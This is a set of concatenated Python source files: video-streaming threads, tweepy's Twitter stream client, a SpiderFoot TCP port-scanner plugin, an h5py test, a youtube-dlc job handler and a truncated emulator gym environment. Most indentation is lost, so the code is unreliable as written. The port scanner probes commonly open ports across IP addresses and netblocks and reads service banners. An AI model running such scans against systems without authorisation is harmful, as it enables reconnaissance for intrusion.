# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
'''Invoked by the camera thread when a new frame is available.'''
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
'''Invoked from each client's thread after a frame was processed.'''
self.events[get_ident()][0].clear()
'''
A base class for video sources: it owns the background camera thread and
signals all active clients when a new frame is available.
'''
class VideoBase(object):
thread = None # background thread that reads frames from video stream
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = VideoEvent()
video_source = 0 # video stream source: camera or video file
def __init__(self, video_source):
VideoBase.video_source = video_source
"""Start the background camera thread if it isn't running yet."""
if VideoBase.thread is None:
VideoBase.last_access = time.time()
# start background frame thread
VideoBase.thread = threading.Thread(target=self._thread)
VideoBase.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
''' Get current frame from video stream '''
def get_frame(self):
"""Return the current camera frame."""
VideoBase.last_access = time.time()
# wait for a signal from the camera thread
VideoBase.event.wait()
VideoBase.event.clear()
return VideoBase.frame
    ''' Abstract interface to be implemented by subclasses '''
@staticmethod
def frames():
'''Generator that returns frames from the camera.'''
raise RuntimeError('Must be implemented by subclasses.')
''' thread function to process video stream '''
@classmethod
def _thread(cls):
'''Launch background thread.'''
print('Starting videostream thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
VideoBase.frame = frame
VideoBase.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - VideoBase.last_access > 10:
frames_iterator.close()
print('Stopping videostream thread due to inactivity.')
break
VideoBase.thread = None
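# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Minimal example of the subclassing pattern described above: a concrete video
# source only has to override frames() as a generator. The synthetic byte
# payload below is a placeholder; a real camera class would yield encoded
# (e.g. JPEG) frames.
class _ExampleVideoSource(VideoBase):
    @staticmethod
    def frames():
        count = 0
        while True:
            count += 1
            yield ('frame %d' % count).encode('ascii')  # placeholder frame payload
            time.sleep(0.1)
# A client would then do something like:
#   source = _ExampleVideoSource(video_source=0)
#   frame = source.get_frame()  # blocks until the background thread signals a frame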
|
streaming.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import requests
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
    until enough data is returned. On some systems (e.g. Google App Engine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
    For low throughput systems we don't want to sacrifice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size):
self._stream = stream
self._buffer = ''
self._chunk_size = chunk_size
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
def read_line(self, sep='\n'):
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exception = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
                # This is still necessary, as an SSLError can actually be
                # thrown when using Requests.
                # If it's not a timeout, treat it like any other exception.
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exception = exc
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exception = exc
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exception:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exception)
raise exception
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
buf = ReadBuffer(resp.raw, self.chunk_size)
while self.running and not resp.raw.closed:
length = 0
while not resp.raw.closed:
line = buf.read_line().strip()
if not line:
self.listener.keep_alive() # keep-alive new lines are expected
elif line.isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, languages=None):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = unicode(filter_level, encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
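# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Minimal example of wiring a StreamListener subclass to a Stream. The
# credentials in the commented lines are placeholders, and OAuthHandler comes
# from tweepy; this sketch follows the same legacy API style used in this file.
class _PrintListener(StreamListener):
    def on_status(self, status):
        print(status.text)

    def on_error(self, status_code):
        # Returning False tells Stream._run() to stop; stop on rate limiting (420).
        return status_code != 420

# from tweepy import OAuthHandler
# auth = OAuthHandler('CONSUMER_KEY', 'CONSUMER_SECRET')          # placeholder credentials
# auth.set_access_token('ACCESS_TOKEN', 'ACCESS_TOKEN_SECRET')
# stream = Stream(auth, _PrintListener())
# stream.filter(track=['python'], async=True)  # async=True runs the read loop in a background thread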
|
sfp_portscan_tcp.py
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_portscan_tcp
# Purpose: SpiderFoot plug-in for performing a basic TCP port scan of IP
# addresses identified.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 20/02/2013
# Copyright: (c) Steve Micallef 2013
# Licence: MIT
# -------------------------------------------------------------------------------
import random
import threading
import time
from netaddr import IPNetwork
from spiderfoot import SpiderFootEvent, SpiderFootPlugin
class sfp_portscan_tcp(SpiderFootPlugin):
meta = {
'name': "Port Scanner - TCP",
'summary': "Scans for commonly open TCP ports on Internet-facing systems.",
'flags': ["slow", "invasive"],
'useCases': ["Footprint", "Investigate"],
'categories': ["Crawling and Scanning"]
}
# Default options
opts = {
# Commonly used ports on external-facing systems
'ports': ['21', '22', '23', '25', '53', '79', '80', '81', '88', '110', '111',
'113', '119', '123', '137', '138', '139', '143', '161', '179',
'389', '443', '445', '465', '512', '513', '514', '515', '3306',
'5432', '1521', '2638', '1433', '3389', '5900', '5901', '5902',
'5903', '5631', '631', '636',
'990', '992', '993', '995', '1080', '8080', '8888', '9000'],
'timeout': 15,
'maxthreads': 10,
'randomize': True,
'netblockscan': True,
'netblockscanmax': 24
}
# Option descriptions
optdescs = {
'maxthreads': "Number of ports to try to open simultaneously (number of threads to spawn at once.)",
'ports': r"The TCP ports to scan. Prefix with an '@' to iterate through a file containing ports to try (one per line), e.g. @C:\ports.txt or @/home/bob/ports.txt. Or supply a URL to load the list from there.",
'timeout': "Seconds before giving up on a port.",
'randomize': "Randomize the order of ports scanned.",
'netblockscan': "Port scan all IPs within identified owned netblocks?",
'netblockscanmax': "Maximum netblock/subnet size to scan IPs within (CIDR value, 24 = /24, 16 = /16, etc.)"
}
results = None
portlist = list()
portResults = dict()
lock = None
errorState = False
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.results = self.tempStorage()
self.__dataSource__ = "Target Network"
self.lock = threading.Lock()
for opt in list(userOpts.keys()):
self.opts[opt] = userOpts[opt]
portlist = list()
if self.opts['ports'][0].startswith("http://") or \
self.opts['ports'][0].startswith("https://") or \
self.opts['ports'][0].startswith("@"):
file_ports = self.sf.optValueToData(self.opts['ports'][0])
if file_ports:
portlist = file_ports.split("\n")
else:
self.error(f"Could not load ports from {self.opts['ports'][0]}")
else:
portlist = self.opts['ports']
# Convert to integers
for port in set(portlist):
try:
self.portlist.append(int(port))
except ValueError:
self.debug(f"Skipping invalid port '{port}' specified in port list")
if self.opts['randomize']:
random.SystemRandom().shuffle(self.portlist)
# What events is this module interested in for input
def watchedEvents(self):
return ['IP_ADDRESS', 'NETBLOCK_OWNER']
# What events this module produces
def producedEvents(self):
return ["TCP_PORT_OPEN", "TCP_PORT_OPEN_BANNER"]
def tryPort(self, ip, port):
peer = f"{ip}:{port}"
try:
sock = self.sf.safeSocket(ip, port, self.opts['timeout'])
with self.lock:
self.portResults[peer] = True
except Exception:
with self.lock:
self.portResults[peer] = False
return
# If the port was open, see what we can read
try:
with self.lock:
self.portResults[peer] = sock.recv(4096)
except Exception:
sock.close()
return
sock.close()
def tryPortWrapper(self, ip, portList):
self.portResults = dict()
running = True
i = 0
t = []
# Spawn threads for scanning
while i < len(portList):
port = portList[i]
self.info(f"Spawning thread to check port: {port} on {ip}")
t.append(threading.Thread(name=f"sfp_portscan_tcp_{port}", target=self.tryPort, args=(ip, port)))
t[i].start()
i += 1
# Block until all threads are finished
while running:
found = False
for rt in threading.enumerate():
if rt.name.startswith("sfp_portscan_tcp_"):
found = True
if not found:
running = False
time.sleep(0.25)
return self.portResults
    # Generate TCP_PORT_OPEN and TCP_PORT_OPEN_BANNER events
def sendEvent(self, resArray, srcEvent):
for cp in resArray:
if not resArray[cp]:
continue
self.info(f"TCP port {cp} found to be OPEN.")
evt = SpiderFootEvent("TCP_PORT_OPEN", cp, self.__name__, srcEvent)
self.notifyListeners(evt)
if resArray[cp] is not True:
banner = str(resArray[cp], 'utf-8', errors='replace')
bevt = SpiderFootEvent("TCP_PORT_OPEN_BANNER", banner, self.__name__, evt)
self.notifyListeners(bevt)
# Handle events sent to this module
def handleEvent(self, event):
eventName = event.eventType
srcModuleName = event.module
eventData = event.data
if self.errorState:
return
self.debug(f"Received event, {eventName}, from {srcModuleName}")
if not self.portlist:
self.error('No ports specified in port list')
self.errorState = True
return
scanIps = list()
if eventName == "NETBLOCK_OWNER":
if not self.opts['netblockscan']:
self.debug(f"Scanning of owned netblocks is disabled. Skipping netblock {eventData}.")
return
try:
net = IPNetwork(eventData)
except Exception as e:
self.error(f"Strange netblock identified, unable to parse: {eventData} ({e})")
return
if net.prefixlen < self.opts['netblockscanmax']:
self.debug(f"Skipping port scanning of owned net block {eventData}, too big.")
return
for ip in net:
ipaddr = str(ip)
if '255' in ipaddr.split("."):
continue
if ipaddr.split(".")[3] == '0':
continue
scanIps.append(ipaddr)
else:
scanIps.append(eventData)
for ipAddr in set(scanIps):
if ipAddr in self.results:
self.debug(f"Skipping {ipAddr} as already scanned.")
                continue
self.results[ipAddr] = True
self.info(f"Scanning {len(set(self.portlist))} ports on {ipAddr}")
i = 0
portArr = []
for port in self.portlist:
if self.checkForStop():
return
if i < self.opts['maxthreads']:
portArr.append(port)
else:
self.sendEvent(self.tryPortWrapper(ipAddr, portArr), event)
i = 0
portArr = [port]
i += 1
# Scan whatever is remaining
self.sendEvent(self.tryPortWrapper(ipAddr, portArr), event)
# End of sfp_portscan_tcp class
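# --- Illustrative sketch (added for clarity; not part of the original module) ---
# The module above relies on SpiderFoot's safeSocket() helper; outside of
# SpiderFoot, the same "try to connect, then try to read a banner" check can be
# approximated with the standard socket module, as in this rough sketch.
def _check_port(ip, port, timeout=5):
    import socket
    try:
        sock = socket.create_connection((ip, port), timeout=timeout)
    except OSError:
        return None                    # closed, filtered, or unreachable
    try:
        sock.settimeout(timeout)
        banner = sock.recv(4096)       # may be empty if the service stays quiet
    except OSError:
        banner = b''
    finally:
        sock.close()
    return banner
# Example: _check_port('192.0.2.1', 22) might return b'SSH-2.0-...' for an open
# SSH port, or None if the connection was refused or timed out.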
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Tests the h5py.File object.
"""
from __future__ import absolute_import
import threading
import h5py
from .common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from membership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
import threading
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
ydlhandler.py
|
import os
from queue import Queue
from threading import Thread
import subprocess
from collections import ChainMap
import io
import importlib
import youtube_dlc
import json
from time import sleep
import sys
from ydl_server.logdb import JobsDB, Job, Actions, JobType
from ydl_server import jobshandler
from ydl_server.config import app_defaults
queue = Queue()
thread = None
done = False
def start():
    global thread
    thread = Thread(target=worker)
    thread.start()
def put(obj):
queue.put(obj)
def finish():
    global done
    done = True
def worker():
while not done:
job = queue.get()
job.status = Job.RUNNING
jobshandler.put((Actions.SET_STATUS, (job.id, job.status)))
if job.type == JobType.YDL_DOWNLOAD:
output = io.StringIO()
stdout_thread = Thread(target=download_log_update,
args=(job, output))
stdout_thread.start()
try:
job.log = Job.clean_logs(download(job.url, {'format': job.format}, output, job.id))
job.status = Job.COMPLETED
except Exception as e:
job.status = Job.FAILED
job.log += str(e)
print("Exception during download task:\n" + str(e))
stdout_thread.join()
elif job.type == JobType.YDL_UPDATE:
rc, log = update()
job.log = Job.clean_logs(log)
job.status = Job.COMPLETED if rc == 0 else Job.FAILED
jobshandler.put((Actions.UPDATE, job))
queue.task_done()
def reload_youtube_dl():
for module in list(sys.modules.keys()):
if 'youtube' in module:
importlib.reload(sys.modules[module])
def update():
if os.environ.get('YDL_PYTHONPATH'):
command = ["pip", "install", "--no-cache-dir", "-t", os.environ.get('YDL_PYTHONPATH'), "--upgrade", "youtube-dlc"]
else:
command = ["pip", "install", "--no-cache-dir", "--upgrade", "youtube-dlc"]
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = proc.communicate()
if proc.returncode == 0:
reload_youtube_dl()
return proc.returncode, str(out.decode('utf-8'))
def get_ydl_options(request_options):
request_vars = {
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_RECODE_VIDEO_FORMAT': None,
}
requested_format = request_options.get('format', 'bestvideo')
if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
elif requested_format == 'bestaudio':
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format
ydl_vars = ChainMap(request_vars, os.environ, app_defaults)
postprocessors = []
if(ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']):
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
})
if(ydl_vars['YDL_RECODE_VIDEO_FORMAT']):
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
})
ydl_options = {
'format': ydl_vars['YDL_FORMAT'],
'postprocessors': postprocessors,
'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
'download_archive': ydl_vars['YDL_ARCHIVE_FILE'],
'cachedir': ydl_vars['YDL_CACHE_DIR']
}
ydl_options = {**ydl_vars['YDL_RAW_OPTIONS'], **ydl_options}
if ydl_vars['YDL_SUBTITLES_LANGUAGES']:
ydl_options['writesubtitles'] = True
if ydl_vars['YDL_SUBTITLES_LANGUAGES'] != 'all':
ydl_options['subtitleslangs'] = \
ydl_vars['YDL_SUBTITLES_LANGUAGES'].split(',')
else:
ydl_options['allsubtitles'] = True
return ydl_options
def download_log_update(job, stringio):
while job.status == Job.RUNNING:
job.log = Job.clean_logs(stringio.getvalue())
jobshandler.put((Actions.SET_LOG, (job.id, job.log)))
sleep(5)
def fetch_metadata(url):
stdout = io.StringIO()
stderr = io.StringIO()
info = None
with youtube_dlc.YoutubeDL({'extract_flat': 'in_playlist'}) as ydl:
ydl.params['extract_flat'] = 'in_playlist'
return ydl.extract_info(url, download=False)
def download(url, request_options, output, job_id):
with youtube_dlc.YoutubeDL(get_ydl_options(request_options)) as ydl:
ydl.params['extract_flat'] = 'in_playlist'
ydl_opts = ChainMap(os.environ, app_defaults)
info = ydl.extract_info(url, download=False)
if 'title' in info and info['title']:
jobshandler.put((Actions.SET_NAME, (job_id, info['title'])))
if '_type' in info and info['_type'] == 'playlist' \
and 'YDL_OUTPUT_TEMPLATE_PLAYLIST' in ydl_opts:
ydl.params['outtmpl'] = ydl_opts['YDL_OUTPUT_TEMPLATE_PLAYLIST']
ydl.params['extract_flat']= False
# Swap out sys.stdout as ydl's output so we can capture it
ydl._screen_file = output
ydl._err_file = ydl._screen_file
ydl.download([url])
return ydl._screen_file.getvalue()
def resume_pending():
db = JobsDB(readonly=False)
jobs = db.get_all()
not_endeds = [job for job in jobs if job['status'] == "Pending" or job['status'] == 'Running']
for pending in not_endeds:
if int(pending["type"]) == JobType.YDL_UPDATE:
jobshandler.put((Actions.SET_STATUS, (pending["id"], Job.FAILED)))
else:
job = Job(pending["name"], Job.PENDING, "Queue stopped",
int(pending["type"]), pending["format"], pending["url"])
job.id = pending["id"]
jobshandler.put((Actions.RESUME, job))
def join():
if thread is not None:
return thread.join()
def get_ydl_version():
return youtube_dlc.version.__version__
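# --- Illustrative sketch (added for clarity; not part of the original module) ---
# Example of how a download request's "format" field is turned into youtube-dlc
# options by get_ydl_options(): audio formats map to an FFmpegExtractAudio
# post-processor, container formats to FFmpegVideoConvertor, and the remaining
# keys come from environment variables / app_defaults. Wrapped in a helper so
# nothing runs at import time; the 'mp3' value is just an example input.
def _example_options():
    opts = get_ydl_options({'format': 'mp3'})
    # opts['postprocessors'] now contains an FFmpegExtractAudio entry with
    # preferredcodec='mp3'; opts['outtmpl'], opts['cachedir'], etc. are taken
    # from YDL_* environment variables or app_defaults.
    return opts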
|
mupen64plus_env.py
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self, rom_name):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.numpy_array = None
self.controller_server, self.controller_server_thread = self._start_controller_server()
self.xvfb_process, self.emulator_process = self._start_emulator(rom_name=rom_name)
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(config['SCR_H'], config['SCR_W'], config['SCR_D']))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[0, 1], # A Button
[0, 1], # B Button
[0, 1]]) # RB Button
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(action)
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = config['OFFSET_X']
offset_y = config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": config['SCR_W'],
"height": config['SCR_H']}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.numpy_array = \
np.flip(image_array[:, :, :3], 2)
return self.numpy_array
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.numpy_array
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(('', config['PORT_NUMBER']),
config['ACTION_TIMEOUT'])
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
res_w=config['SCR_W'],
res_h=config['SCR_H'],
res_d=config['SCR_D'],
input_driver_path=config['INPUT_DRIVER_PATH']):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [config['MUPEN_CMD'],
"--resolution",
